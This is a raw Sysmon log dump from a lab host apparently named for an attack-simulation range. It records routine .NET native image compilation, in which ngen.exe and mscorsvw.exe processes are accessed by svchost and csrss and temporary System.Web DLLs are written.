13:51:23.507{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-925B-6005-7504-00000000A301}2856C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008725Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:51:23.491{59A5CD1D-8E44-6005-0500-00000000A301}640656C:\Windows\system32\csrss.exe{59A5CD1D-925B-6005-7504-00000000A301}2856C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000008724Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:51:23.491{59A5CD1D-90A3-6005-3001-00000000A301}41442936C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{59A5CD1D-925B-6005-7504-00000000A301}2856C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+abce(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+af4a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b1b4(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8f0a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8fe3(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+9082(wow64) 11241100x80000000000000008723Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localDLL2021-01-18 13:51:23.444{59A5CD1D-925B-6005-7404-00000000A301}3448C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_32\Temp\d78-0\System.Web.Abstractions.dll2021-01-18 13:51:23.444 10341000x80000000000000008722Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:51:23.413{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-925B-6005-7404-00000000A301}3448C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008721Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:51:23.397{59A5CD1D-8E44-6005-0500-00000000A301}640656C:\Windows\system32\csrss.exe{59A5CD1D-925B-6005-7404-00000000A301}3448C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000008720Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:51:23.397{59A5CD1D-90A3-6005-3001-00000000A301}41444264C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{59A5CD1D-925B-6005-7404-00000000A301}3448C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+77e0d|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ae03(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c43d(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c4ad(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60779(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60744(wow64) 10341000x80000000000000008719Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:51:23.319{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-925B-6005-7304-00000000A301}4396C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008718Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:51:23.303{59A5CD1D-8E44-6005-0500-00000000A301}640756C:\Windows\system32\csrss.exe{59A5CD1D-925B-6005-7304-00000000A301}4396C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000008717Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:51:23.303{59A5CD1D-90A3-6005-3001-00000000A301}41442936C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{59A5CD1D-925B-6005-7304-00000000A301}4396C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+abce(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+af4a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b1b4(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8f0a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8fe3(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+9082(wow64) 10341000x80000000000000008743Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:51:25.928{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-925D-6005-7A04-00000000A301}5088C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008742Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:51:25.913{59A5CD1D-8E44-6005-0500-00000000A301}6401180C:\Windows\system32\csrss.exe{59A5CD1D-925D-6005-7A04-00000000A301}5088C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000008741Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:51:25.913{59A5CD1D-90A3-6005-3001-00000000A301}41444264C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{59A5CD1D-925D-6005-7A04-00000000A301}5088C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+77e0d|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ae03(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c43d(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c4ad(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60779(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60744(wow64) 10341000x80000000000000008740Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:51:25.850{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-925D-6005-7904-00000000A301}4884C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008739Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:51:25.835{59A5CD1D-8E44-6005-0500-00000000A301}6401180C:\Windows\system32\csrss.exe{59A5CD1D-925D-6005-7904-00000000A301}4884C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000008738Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:51:25.835{59A5CD1D-90A3-6005-3001-00000000A301}41442936C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{59A5CD1D-925D-6005-7904-00000000A301}4884C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+abce(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+af4a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b1b4(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8f0a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8fe3(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+9082(wow64) 11241100x80000000000000008737Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localDLL2021-01-18 13:51:25.694{59A5CD1D-925B-6005-7804-00000000A301}3968C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_32\Temp\f80-0\System.Web.DataVisualization.dll2021-01-18 13:51:25.694 10341000x80000000000000008750Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:51:26.397{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-925E-6005-7C04-00000000A301}2868C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008749Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:51:26.381{59A5CD1D-8E44-6005-0500-00000000A301}640656C:\Windows\system32\csrss.exe{59A5CD1D-925E-6005-7C04-00000000A301}2868C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000008748Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:51:26.381{59A5CD1D-90A3-6005-3001-00000000A301}41444264C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{59A5CD1D-925E-6005-7C04-00000000A301}2868C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+77e0d|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ae03(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c43d(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c4ad(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60779(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60744(wow64) 10341000x80000000000000008747Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:51:26.194{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-925E-6005-7B04-00000000A301}3692C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008746Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:51:26.194{59A5CD1D-8E44-6005-0500-00000000A301}640756C:\Windows\system32\csrss.exe{59A5CD1D-925E-6005-7B04-00000000A301}3692C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000008745Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:51:26.194{59A5CD1D-90A3-6005-3001-00000000A301}41442936C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{59A5CD1D-925E-6005-7B04-00000000A301}3692C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+abce(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+af4a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b1b4(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8f0a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8fe3(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+9082(wow64) 11241100x80000000000000008744Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localDLL2021-01-18 13:51:26.116{59A5CD1D-925D-6005-7A04-00000000A301}5088C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_32\Temp\13e0-0\System.Web.DataVisualization.Design.dll2021-01-18 13:51:26.116 11241100x80000000000000008755Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localDLL2021-01-18 
13:51:27.991{59A5CD1D-925F-6005-7D04-00000000A301}4520C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_32\Temp\11a8-0\System.Web.DynamicData.dll2021-01-18 13:51:27.991 10341000x80000000000000008754Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:51:27.553{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-925F-6005-7D04-00000000A301}4520C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008753Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 